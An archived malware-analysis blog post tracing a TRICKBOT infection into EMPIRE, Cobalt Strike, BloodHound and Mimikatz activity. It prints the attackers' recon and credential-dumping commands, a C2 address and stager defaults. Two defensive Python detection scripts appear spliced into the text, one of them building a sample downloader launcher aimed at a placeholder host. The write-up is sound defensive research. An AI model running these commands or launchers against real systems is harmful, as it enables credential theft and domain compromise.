{
	"id": "7a171973-7a24-4fcf-ad49-2e9a5b04ac10",
	"created_at": "2026-04-06T00:16:51.035311Z",
	"updated_at": "2026-04-10T03:36:36.778815Z",
	"deleted_at": null,
	"sha1_hash": "81032e08a5d05058cf87a625bb4a070ebdb63acb",
	"title": "TRICKBOT Analysis - Part II",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 894483,
	"plain_text": "TRICKBOT Analysis - Part II\r\nBy Mark R\r\nPublished: 2019-10-29 · Archived: 2026-04-05 21:58:12 UTC\r\nSome further TTPs used by TRICKBOT [1] on an infected host that I thought were interesting enough to share. The sample used here is from an EMOTET to TRICKBOT infection (\"GTAG:mor14\") courtesy of Malware-Traffic-Analysis. 👏👏\r\nSamples Used\r\nC:\\Users\\AUSER\\AppData\\Roaming\\netcloud\\բնութագրվում է.exe\r\nC:\\Users\\AUSER\\AppData\\Roaming\\colorsallow.exe\r\nSHA256 Hash: 3A6C3F7B99B2E76914FBC338C622B92F9825CB77729B8BF050BA64ECE1679818\r\nContinuing past research on TRICKBOT's arsenal of modules, I knew there was a PowerShell EMPIRE module, NewBCtestDll64, but had never seen it ITW (in the wild) myself.\r\n2018-10-08 - Quick post: #Trickbot gtag sat75 infection with #PowershellEmpire traffic - https://t.co/sU86nZJnh2 - part of ongoing US-based Paypal-themed Trickbot #malspam campaign. Powershell Empire traffic seems tied to the NewBCtestDll64 module (and probably the 32 bit version\r\npic.twitter.com/A5m64aIRd7\r\n— Brad (@malware_traffic) October 10, 2018\r\nThis soon escalated to COBALT-STRIKE connectivity and BLOODHOUND reconnaissance. In this observed activity, EMPIRE was used for reconnaissance and privilege escalation, and COBALT-STRIKE for delivering further recon by means of BLOODHOUND; both tools attempted credential dumping with MIMIKATZ. The endgame here is for the adversary to escalate privileges all the way to Domain Admin for full domain compromise, and then deliver one of the many ransomware variants such as RYUK [2] 💣💣💣💥💲💲💲.\r\nhttps://www.sneakymonkey.net/2019/10/29/trickbot-analysis-part-ii/\r\nPage 1 of 10\r\nRECENT NOTES ON EMPIRE\r\nFor those that do not know, PowerShell EMPIRE is a post-exploitation framework written in PowerShell.
This project was recently retired: with the heightened uptake of PowerShell visibility over the last few years, the project stated it had reached its goal and ended support.\r\nAlthough EMPIRE is now retired it is still being used ITW (in the wild). It still works, it is just no longer supported. I'd expect an uptake of other C2 post-exploitation frameworks; many such are listed here: Remote Access Tools.\r\nTHE RUNDOWN\r\nA quick series of events unfolds. Some of these are documented here. From EMOTET infection to CS connectivity it was less than 48 hrs.\r\nDelivery via PHISHING 🎣\r\nEMOTET infection and persistence created.\r\nPushes TRICKBOT to steal data.\r\nFollow-up EMPIRE C2 connectivity\r\n- POWERSPLOIT for recon/info-steal\r\n- MIMIKATZ for credential dumping/priv esc\r\nFollow-up COBALT-STRIKE C2 connectivity\r\n- BLOODHOUND for domain recon/priv esc\r\nComplete domain ownage (?)\r\nRansomware variant delivery (?)\r\nGame Over!\r\nHighlighted steps were observed activity; the steps marked (?) were not observed here.\r\nHELLO POWERSHELL EMPIRE\r\nTo start off we identify the newly established EMPIRE connectivity.\r\nThe initial \"stager\" is how the victim talks back to the EMPIRE C2, which is listening for the connection and then serves stage 2, the EMPIRE agent. The default launcher/stager is a Base64-encoded, lightly obfuscated PowerShell command.\r\nBy capturing the PowerShell activity on our box (PowerShell logging, plus command-line audit logging via EID 4688 - which only carries the command line if \"Include command line in process creation events\" is enabled), decoding and identifying the EMPIRE stager wasn't too difficult, because most if not all of the EMPIRE defaults had been left unchanged. The CyberChef EMPIRE stager recipe used is available here.\r\nEMPIRE Stager\r\nOn decoding this Base64 blob, the key items to look for are the default settings for an EMPIRE stager as documented in the official EMPIRE Github repo.
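The same triage can be scripted for bulk 4688 command lines rather than pasted into CyberChef one at a time. The Python below is an added example written for this page, not the post's CyberChef recipe and not code from the Empire project: it pulls the Base64 out of a -enc / -EncodedCommand launcher, decodes it as UTF-16LE (which is what PowerShell expects), and checks the result against the EMPIRE defaults listed in the next paragraph. The sample launcher is constructed here from those documented defaults; the 192.0.2.10:8080 C2 and the session cookie value are placeholders, not indicators from this infection.

```python
import base64
import re

# Empire stager defaults from the EmpireProject repo (the values the post checks for).
EMPIRE_DEFAULT_UA = 'Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko'
EMPIRE_DEFAULT_URIS = ('/login/process.php', '/admin/get.php', '/admin/news.php')

# Matches -e / -ec / -enc / -EncodedCommand followed by the Base64 blob.
ENC_FLAG = re.compile('-(?:encodedcommand|enc|ec|e) +([A-Za-z0-9+/=]+)', re.IGNORECASE)

# Constructed sample: a trimmed Empire-style launcher with the defaults left in place.
# 192.0.2.10 is a documentation address and the cookie value is a placeholder; neither
# comes from the infection described in the post.
SAMPLE_SCRIPT = '''$wc=New-Object System.Net.WebClient;$u='Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko';$ser='http://192.0.2.10:8080';$t='/admin/get.php';$wc.Headers.Add('User-Agent',$u);$wc.Headers.Add('Cookie','session=AbCdEfGhIjKlMnOpQrStUvWxYz==');$data=$wc.DownloadData($ser+$t);'''


def to_encoded_launcher(script):
    # -EncodedCommand takes Base64 of the UTF-16LE bytes of the script, not of UTF-8.
    blob = base64.b64encode(script.encode('utf-16-le')).decode('ascii')
    return 'powershell -noP -sta -w 1 -enc ' + blob


SAMPLE_CMDLINE = to_encoded_launcher(SAMPLE_SCRIPT)


def extract_encoded_command(cmdline):
    m = ENC_FLAG.search(cmdline)
    return m.group(1) if m else None


def decode_powershell(blob):
    return base64.b64decode(blob).decode('utf-16-le')


def empire_indicators(script):
    # Each default left in place is one more reason to call this an Empire stager.
    uri = next((u for u in EMPIRE_DEFAULT_URIS if u in script), None)
    c2 = re.search('https?://[A-Za-z0-9.:-]+', script)
    return {
        'default_user_agent': EMPIRE_DEFAULT_UA in script,
        'default_uri': uri,
        # Empire sends its routing packet in a Cookie header named session=...
        'session_cookie': re.search('Cookie.{1,4}session=', script) is not None,
        'c2': c2.group(0) if c2 else None,
    }


def triage(cmdline):
    blob = extract_encoded_command(cmdline)
    if blob is None:
        return {'encoded': False}
    try:
        script = decode_powershell(blob)
    except ValueError:
        # Command lines truncated by the logging pipeline leave a blob that will not decode.
        return {'encoded': True, 'decode_error': True}
    result = empire_indicators(script)
    result['encoded'] = True
    result['likely_empire'] = (result['default_user_agent']
                               and result['default_uri'] is not None
                               and result['session_cookie'])
    return result


if __name__ == '__main__':
    for key, value in triage(SAMPLE_CMDLINE).items():
        print(key, value)
```

Run it over every 4688 or Sysmon process-creation command line that contains an encoded flag; anything that decodes to all three defaults deserves an immediate look, and the c2 field gives you the host to block. A launcher that deviates from the defaults is not cleared by this check: operators can change the user-agent and URIs in the listener profile, so treat the result as a fast positive, not as a negative.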
These defaults are:\r\nUser-Agent:\r\nMozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko\r\nSession cookie header:\r\n\"Cookie\", \"session=XXXXXXXXXXXXXX\"\r\nOne of the following URIs:\r\n/login/process.php\r\n/admin/get.php\r\n/admin/news.php\r\nYou can see the decoded result and the highlighted fields. The values were left as the defaults in the Github EMPIRE repo; the default user-agent string and URIs for EMPIRE are listed above for reference. Any one of them alone is weak evidence (the user-agent is a stock IE11 string), but all three together inside a Base64-encoded launcher is a reliable EMPIRE signature.\r\nSTEP IN POWERSPLOIT\r\nOnce the EMPIRE connection is established we see plenty of follow-up POWERSPLOIT activity.\r\nPowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules: CodeExecution, ScriptModification, Persistence, AntivirusBypass, Exfiltration, Mayhem, Privesc, Recon.\r\nSimply put, the threat actor starts profiling, or gathering situational awareness of, the new environment they have landed in. The Get-Net* cmdlets below are PowerView, PowerSploit's Recon module; the | Out-String | %{$_ + \"`n\"};\"`n... completed!\" wrapper is how EMPIRE's powerview modules format their output, and is itself a useful string to hunt for in script block logs:\r\nGet-NetComputer | Out-String | %{$_ + \"`n\"};\"`nGet-NetComputer completed!\"\r\nGet-NetComputer -OperatingSystem *server* | Out-String | %{$_ + \"`n\"};\"`nGet-NetComputer completed!\"\r\nGet-NetDomainTrust | Out-String | %{$_ + \"`n\"};\"`nGet-NetDomainTrust completed!\"\r\nGet-NetDomainController | Out-String | %{$_ + \"`n\"};\"`nGet-NetDomainController completed!\"\r\nInvoke-MapDomainTrust | ConvertTo-Csv -NoTypeInformation | Out-String | %{$_ + \"`n\"};\"`nInvoke-MapDomainTrust c\r\nFrom the manual, descriptions of each:\r\nGet-NetComputer - gets a list of all current servers in the domain\r\nGet-NetDomainTrust - gets all trusts for the current user's domain\r\nGet-NetForestTrust - gets all trusts for the forest associated with the current user's domain\r\nInvoke-MapDomainTrust - try to build a relational mapping of all domain trusts\r\nGet-NetDomainController - gets the domain controllers for the current computer's domain\r\nShortly after, this was followed by an attempted credential dump using POWERSPLOIT's Invoke-Mimikatz -DumpCreds, which actually failed in this environment:\r\n\"VirtualAlloc failed to allocate memory for PE. If PE is not ASLR compatible, try running the script in a new PowerShell process (the new PowerShell process will have a different memory layout, so the address the PE wants might be free).\"\r\nThe MIMIKATZ build bundled with EMPIRE v2.1.1 20171106 / POWERSPLOIT v2.0 alpha seems problematic on newer builds of Windows 10. MIMIKATZ at the time of writing is at version v2.2.0-20190813, so these frameworks were using an outdated version; the failed dump is an artefact of stale tooling, not of any control on the host. (Cheers DP - REDTEAM FRIEND 👍👍)\r\nSTEP IN COBALTSTRIKE AND BLOODHOUND 🐶\r\nA quick background for those not in the know.\r\nCobalt Strike is software for Adversary Simulations and Red Team Operations... Cobalt Strike gives you a post-exploitation agent and covert channels to emulate a quiet long-term embedded actor in your customer's network.\r\nhttps://www.cobaltstrike.com/\r\nBloodHound uses graph theory to reveal the hidden and often unintended relationships within an Active Directory environment. Attackers can use BloodHound to easily identify highly complex attack paths that would otherwise be impossible to quickly identify.\r\nhttps://github.com/BloodHoundAD/BloodHound\r\nI was originally surprised by the use of Invoke-BloodHound, which comes from the default BLOODHOUND ingester SharpHound (ingester = data gatherer): SharpHound.ps1 runs the BloodHound C# ingestor using reflection. With that little BloodHound 101 out of the way, first up was the CS stager and connectivity.\r\nThe captured stager command kicks off a COBALT-STRIKE 'beacon stager'.
This hosted stager uses @MrUn1k0d3r's \"DONT KILL MY CAT\" (DKMC) 🙀, which obfuscates the shellcode to avoid detection when it is executed on the endpoint. This DKMC 'template', together with the beacon-style User-Agent and C2 recovered below, gives away the use of COBALT-STRIKE.\r\nURLScan Screenshot\r\nVirustotal\r\nDECODING COBALT-STRIKE PAYLOADS\r\nThe URL points to this hosted PowerShell script...\r\nBase64 decoding and gunzip decompression yield a DKMC PowerShell stager carrying Base64-encoded, XOR-encrypted shellcode. Another Base64 decode and an XOR decrypt with the hardcoded single-byte key 35 (0x23) recover the shellcode; CyberChef does the heavy lifting here. A single-byte XOR key is trivially recoverable even when it is not sitting in the script: XOR the blob with each of the 256 candidates and keep the one that yields readable strings.\r\nWhich leaves us with a nice COBALT-STRIKE C2 and User-Agent string:\r\nUser-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; FunWebProducts\r\n185.147.14[.]242\r\nOnce an active connection was made to the infected victim, a follow-up series of recon commands was carried out via Get-NetLoggedon and Get-NetComputer | Out-String | %{$_ + \"`n\"};\"`nGet-NetComputer completed!\", and another attempt to dump credentials was made with Invoke-Mimikatz. Lastly we see the domain recon via BLOODHOUND:\r\nSet-Alias Get-BloodHoundData Invoke-BloodHound\r\nInvoke-BloodHound -Threads 20 -CollectionMethod Default -Throttle 1000 -CSVFolder $(Get-Location) | Out-String\r\nWriting output to CSVs in: C:\\Users\\USER\\AppData\\Roaming\\netcloud\\\r\nDone writing output to CSVs in: C:\\Users\\USER\\AppData\\Roaming\\netcloud\\\r\nThis actually left artefacts on disk 🤷‍♂️: local_admins.csv, group_memberships.csv, trusts.csv and user_sessions.csv, all in the TRICKBOT working directory. A sweep for those CSV names outside a sanctioned assessment is a cheap hunt.\r\nShortly after this activity ended (maybe they realised my AD topology wasn't too hot and the penny eventually dropped...) the connections were severed.\r\nOTHER TRICKBOT OBSERVATIONS - ESENTUTL? .EDBs?\r\nOne other thing I noted with this TRICKBOT infection was the use of esentutl to gather IE and Explorer browser history and the WebCache. The command below was seen:\r\nesentutl /p /o C:\\Users\\USER\\AppData\\Local\\Temp\\grabber_temp.edb\r\n/p is the repair switch and /o just suppresses the banner. The grabber_temp.edb staged in Temp is an ESE database of browser history data, presumably a copy of the locked WebCacheV01.dat referenced in the quotes below; because the live file was open when it was copied, the copy is left in a Dirty Shutdown state and has to be repaired before anything can parse it, which is exactly what the log further down shows.\r\n\"a centralized meta-data store for the browser using the proven \"JET Blue\" Extensible Storage Engine (ESE) database format\"\r\n\"Remember that even if a user never opens Internet Explorer, there may still be valuable records in their IE database including files opened on the local system, network shares, and removable devices\"\r\nhttps://digital-forensics.sans.org/blog/2015/06/03/ese-databases-are-dirty/\r\n\"browser history data and while Chrome and Firefox allow copying of the history files, the WebCacheV01.dat file that IE and Edge history are stored in is a locked file and cannot be copied using native copy\"\r\nhttps://dfironthemountain.wordpress.com/tag/ese-database/\r\nArtefacts on disk will be in the form of a .RAW integrity report:\r\nC:\\Users\\USER\\AppData\\Roaming\\grabber_temp.INTEG.RAW\r\nSnippet from the .RAW log file below; the database is being checked and repaired before it is parsed (and presumably exfiltrated):\r\n***** Repair of database 'C:\\Users\\USER\\AppData\\Local\\Temp\\grabber_temp.edb' started [ESENT version 10.00.17763\r\nsearch for 'ERROR:' to find errors\r\nsearch for 'WARNING:' to find warnings\r\nchecking database header\r\nERROR: database was not shutdown cleanly (Dirty Shutdown)\r\ndatabase file \"C:\\Users\\USER\\AppData\\Local\\Temp\\grabber_temp.edb\" is 43515904 bytes\r\ndatabase file \"C:\\Users\\USER\\AppData\\Local\\Temp\\grabber_temp.edb\" is 43515904 bytes on disk.\r\nCreating 16 threads\r\nYou can download NirSoft's ESEDatabaseView to peek inside the .edb file and see what data has been staged. In summary, the threat actors are looking for files and locations of interest on the network (?).
Maybe profiling whether you are a real user, or providing context and situational awareness of the environment they have spawned into and where to pivot next, such as file servers (?). esentutl and EDB files are ones to be aware of, and a possible addition to the DFIR and 🔵 team toolkit as well: esentutl /p run against a .edb under a user profile, rather than by an administrator against an Exchange or AD (ntds.dit) database, is the telling pattern, and esentutl is already on the LOLBAS list [8].\r\nAs a side note, other previously seen similar activities and ITW sightings, courtesy of @AltShiftPrtScn 🔽.\r\nAnother similar TRICKBOT post-exploitation, but using PSEXEC and AdFind to help deploy RYUK ransomware to the environment: A Nasty Trick: From Credential Theft Malware to Business Disruption\r\nAgain, different attack paths, key sightings on TRICKBOT using EMPIRE/POSHC2 to deliver the \"cyber-aids\" 😂\r\nUsually it's FAKEUPDATES -> DRIDEX | TRICKBOT -> EMPIRE -> CYBERAIDS, but what I just saw was FAKEUPDATES -> DRIDEX -> POSHC2. We stopped it obviously before the CYBERAIDS. Highly recommend not catching the CYBERAIDS.\r\n— Andrew Thompson (@QW5kcmV3) September 11, 2019\r\nWRAP UP\r\nThe combination of EMOTET's access-as-a-service model and TRICKBOT's offensive set of modular tooling poses a real and current threat to businesses large and small. As stated before, once the infected systems have reported back, the threat actors can be pivoting further into your environment within (in this instance) <48 hrs and start to elevate privileges to own the domain and ultimately deliver further badness such as ransomware. With off-the-shelf offensive tooling such as EMPIRE, COBALTSTRIKE, BLOODHOUND, POWERSPLOIT and the infamous MIMIKATZ in play, detecting these tools is key to stopping the likes of TRICKBOT from moving further.\r\nAlso to note is the time taken to detect, investigate and remediate. Doing this in a timely manner is highly recommended.
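Chained recon is easier to catch with a small correlation rule than with an alert per command, since ipconfig /all or nltest on their own are run by administrators all day. The Python below is an added example for this page, not code from the post or from any of the tools it names: it normalises 4688-style command lines, maps them onto the four TRICKBOT recon commands called out in the RECOMMENDATIONS, and raises one alert per host when three or more distinct ones land within five minutes. The event records are constructed for the example; hostnames, usernames and timestamps are placeholders, and the five-minute window and threshold of three are assumptions to tune against your own telemetry.

```python
from collections import defaultdict
from datetime import datetime, timedelta

# Recon commands TRICKBOT runs on a fresh host (see RECOMMENDATIONS), in normalised form.
RECON_COMMANDS = (
    'ipconfig /all',
    'net config workstation',
    'net view /all /domain',
    'nltest /domain_trusts',
)
WINDOW = timedelta(minutes=5)   # assumed; tighten once you have seen real TRICKBOT timing
THRESHOLD = 3                   # distinct recon commands required before alerting
BACKSLASH = chr(92)             # Windows path separator

# Constructed 4688-style records: (UtcTime, Computer, SubjectUserName, CommandLine).
# Hosts, users and times are placeholders, not data from the infection in the post.
SAMPLE_EVENTS = [
    ('2019-10-21T09:14:02', 'WS-017', 'auser', 'ipconfig  /all'),
    ('2019-10-21T09:14:03', 'WS-017', 'auser', 'net  config workstation'),
    ('2019-10-21T09:14:03', 'WS-017', 'auser', 'cmd.exe /c net view /all /domain'),
    ('2019-10-21T09:14:05', 'WS-017', 'auser', 'nltest /domain_trusts'),
    ('2019-10-21T09:14:06', 'WS-017', 'auser', 'nltest /domain_trusts /all_trusts'),
    ('2019-10-21T08:02:11', 'WS-042', 'helpdesk', 'ipconfig /all'),
    ('2019-10-21T11:30:45', 'WS-042', 'helpdesk', 'nltest /domain_trusts'),
    ('2019-10-21T09:20:00', 'SRV-01', 'svc_backup', 'robocopy D: E: /mir'),
]


def normalize(cmdline):
    # Lower-case, collapse whitespace, drop the image directory and .exe suffix, and
    # peel off a leading cmd /c wrapper so the recon command itself gets compared.
    tokens = cmdline.lower().split()
    if not tokens:
        return ''
    tokens[0] = tokens[0].rsplit(BACKSLASH, 1)[-1]
    if tokens[0].endswith('.exe'):
        tokens[0] = tokens[0][:-4]
    if tokens[0] == 'cmd' and len(tokens) > 2 and tokens[1] in ('/c', '/k'):
        return normalize(' '.join(tokens[2:]))
    return ' '.join(tokens)


def match_recon(cmdline):
    # Exact command, or the command followed by more switches; ipconfig /allcompartments
    # must not count as ipconfig /all.
    norm = normalize(cmdline)
    for pattern in RECON_COMMANDS:
        if norm == pattern or norm.startswith(pattern + ' '):
            return pattern
    return None


def detect_recon_chains(events, window=WINDOW, threshold=THRESHOLD):
    per_host = defaultdict(list)
    for ts, host, user, cmd in events:
        pattern = match_recon(cmd)
        if pattern is not None:
            per_host[host].append((datetime.strptime(ts, '%Y-%m-%dT%H:%M:%S'), user, pattern))

    alerts = []
    for host, hits in per_host.items():
        hits.sort()
        for i, (start, user, _) in enumerate(hits):
            # Distinct recon commands seen in [start, start + window].
            seen = set()
            for t, _, pattern in hits[i:]:
                if t - start > window:
                    break
                seen.add(pattern)
            if len(seen) >= threshold:
                alerts.append({'host': host, 'user': user,
                               'first_seen': start.isoformat(),
                               'commands': sorted(seen)})
                break  # one alert per host is enough to start triage
    return alerts


if __name__ == '__main__':
    for alert in detect_recon_chains(SAMPLE_EVENTS):
        print(alert)
```

Feed it the (time, host, user, command line) tuples from 4688 or Sysmon process-creation events. The post notes TRICKBOT runs these commands within a short time frame of each other, so once you have a real sample the window can usually be tightened well below five minutes, which is what separates the malware from a helpdesk engineer typing the same commands by hand.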
With the likes of offensive PowerShell becoming easier to detect, it's only a matter of time before these TTPs change once more. 🐱🐈🐭🐁\r\nRECOMMENDATIONS\r\nTo avoid the \"cyber-aids\", I recommend:\r\nAs always, defense in depth.\r\nPowerShell visibility is still key for detection: Script Block Logging (EID 4104) plus transcription logging, shipped off the host ASAP so the attacker cannot clear it locally.\r\nCommand-line logging: EventID 4688 with command-line auditing enabled, Sysinternals SYSMON (EID 1), EDR products.\r\nActive Directory auditing and logging to capture BLOODHOUND recon on AD objects. This could be incredibly noisy depending on the environment, but check out \"honey tokens\": fake accounts that should never be queried, so any read of them is a high-fidelity alert.\r\nDetect BLOODHOUND over the wire via IDS/NSM: large LDAP queries from unexpected hosts such as clients, and SMB/RPC session and local-group enumeration from a single workstation against many hosts. Know what's normal first.\r\nFurther segregation of your network where possible to hinder lateral movement.\r\n👾 Purple teaming exercises 👾. Pre-run BLOODHOUND yourself and proactively go after the same fruit as the attackers. Harden and repeat. #PurpleTeaming\r\nDetect TRICKBOT recon: ipconfig /all, net config workstation, net view /all /domain and nltest /domain_trusts within a short time frame or chained together.\r\nIOCS\r\nhttps://pastebin.com/kS6ZJT1W\r\nREFERENCES\r\n[1] TRICKBOT / TA505 GROUP https://attack.mitre.org/groups/G0092/\r\n[2] North Korean APT(?) and recent Ryuk Ransomware attacks https://www.kryptoslogic.com/blog/2019/01/north-korean-apt-and-recent-ryuk-ransomware-attacks/\r\n[3] COBALT-STRIKE https://www.cobaltstrike.com/\r\n[4] BLOODHOUND https://github.com/BloodHoundAD/BloodHound\r\n[5] POWERSPLOIT https://github.com/PowerShellMafia/PowerSploit\r\n[6] EMPIRE https://github.com/EmpireProject/Empire\r\n[7] ESENTUTL https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/hh875603(v%3Dws.11)\r\n[8] LOLBins https://lolbas-project.github.io/\r\n[9] For the LULZ, research into Attacking Powershell Empire https://sysopfb.github.io/malware/2019/10/05/Attacking-powershell-empire.html\r\nSource: https://www.sneakymonkey.net/2019/10/29/trickbot-analysis-part-ii/",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://www.sneakymonkey.net/2019/10/29/trickbot-analysis-part-ii/"
	],
	"report_names": [
		"trickbot-analysis-part-ii"
	],
	"threat_actors": [
		{
			"id": "610a7295-3139-4f34-8cec-b3da40add480",
			"created_at": "2023-01-06T13:46:38.608142Z",
			"updated_at": "2026-04-10T02:00:03.03764Z",
			"deleted_at": null,
			"main_name": "Cobalt",
			"aliases": [
				"Cobalt Group",
				"Cobalt Gang",
				"GOLD KINGSWOOD",
				"COBALT SPIDER",
				"G0080",
				"Mule Libra"
			],
			"source_name": "MISPGALAXY:Cobalt",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "5e6b31a6-80e3-4e7d-8b0a-d94897ce9b59",
			"created_at": "2024-06-19T02:03:08.128175Z",
			"updated_at": "2026-04-10T02:00:03.636663Z",
			"deleted_at": null,
			"main_name": "GOLD TAHOE",
			"aliases": [
				"Cl0P Group Identity",
				"FIN11 ",
				"GRACEFUL SPIDER ",
				"SectorJ04 ",
				"Spandex Tempest ",
				"TA505 "
			],
			"source_name": "Secureworks:GOLD TAHOE",
			"tools": [
				"Clop",
				"Cobalt Strike",
				"FlawedAmmy",
				"Get2",
				"GraceWire",
				"Malichus",
				"SDBbot",
				"ServHelper",
				"TrueBot"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "75d4d6a9-b5d1-4087-a7a0-e4a9587c45f4",
			"created_at": "2022-10-25T15:50:23.5188Z",
			"updated_at": "2026-04-10T02:00:05.26565Z",
			"deleted_at": null,
			"main_name": "TA505",
			"aliases": [
				"TA505",
				"Hive0065",
				"Spandex Tempest",
				"CHIMBORAZO"
			],
			"source_name": "MITRE:TA505",
			"tools": [
				"AdFind",
				"Azorult",
				"FlawedAmmyy",
				"Mimikatz",
				"Dridex",
				"TrickBot",
				"Get2",
				"FlawedGrace",
				"Cobalt Strike",
				"ServHelper",
				"Amadey",
				"SDBbot",
				"PowerSploit"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "99cb4e5b-8071-4f9e-aa1d-45bfbb6197e3",
			"created_at": "2023-01-06T13:46:38.860754Z",
			"updated_at": "2026-04-10T02:00:03.125179Z",
			"deleted_at": null,
			"main_name": "TA505",
			"aliases": [
				"SectorJ04",
				"SectorJ04 Group",
				"ATK103",
				"GRACEFUL SPIDER",
				"GOLD TAHOE",
				"Dudear",
				"G0092",
				"Hive0065",
				"CHIMBORAZO",
				"Spandex Tempest"
			],
			"source_name": "MISPGALAXY:TA505",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "e447d393-c259-46e2-9932-19be2ba67149",
			"created_at": "2022-10-25T16:07:24.28282Z",
			"updated_at": "2026-04-10T02:00:04.921616Z",
			"deleted_at": null,
			"main_name": "TA505",
			"aliases": [
				"ATK 103",
				"Chimborazo",
				"G0092",
				"Gold Evergreen",
				"Gold Tahoe",
				"Graceful Spider",
				"Hive0065",
				"Operation Tovar",
				"Operation Trident Breach",
				"SectorJ04",
				"Spandex Tempest",
				"TA505",
				"TEMP.Warlock"
			],
			"source_name": "ETDA:TA505",
			"tools": [
				"Amadey",
				"AmmyyRAT",
				"AndroMut",
				"Azer",
				"Bart",
				"Bugat v5",
				"CryptFile2",
				"CryptoLocker",
				"CryptoMix",
				"CryptoShield",
				"Dridex",
				"Dudear",
				"EmailStealer",
				"FRIENDSPEAK",
				"Fake Globe",
				"Fareit",
				"FlawedAmmyy",
				"FlawedGrace",
				"FlowerPippi",
				"GOZ",
				"GameOver Zeus",
				"GazGolder",
				"Gelup",
				"Get2",
				"GetandGo",
				"GlobeImposter",
				"Gorhax",
				"GraceWire",
				"Gussdoor",
				"Jaff",
				"Kasidet",
				"Kegotip",
				"Kneber",
				"LOLBAS",
				"LOLBins",
				"Living off the Land",
				"Locky",
				"MINEBRIDGE",
				"MINEBRIDGE RAT",
				"MirrorBlast",
				"Neutrino Bot",
				"Neutrino Exploit Kit",
				"P2P Zeus",
				"Peer-to-Peer Zeus",
				"Philadelphia",
				"Philadephia Ransom",
				"Pony Loader",
				"Rakhni",
				"ReflectiveGnome",
				"Remote Manipulator System",
				"RockLoader",
				"RuRAT",
				"SDBbot",
				"ServHelper",
				"Shifu",
				"Siplog",
				"TeslaGun",
				"TiniMet",
				"TinyMet",
				"Trojan.Zbot",
				"Wsnpoem",
				"Zbot",
				"Zeta",
				"ZeuS",
				"Zeus"
			],
			"source_id": "ETDA",
			"reports": null
		}
	],
	"ts_created_at": 1775434611,
	"ts_updated_at": 1775792196,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/81032e08a5d05058cf87a625bb4a070ebdb63acb.pdf",
		"text": "https://archive.orkl.eu/81032e08a5d05058cf87a625bb4a070ebdb63acb.txt",
		"img": "https://archive.orkl.eu/81032e08a5d05058cf87a625bb4a070ebdb63acb.jpg"
	}
}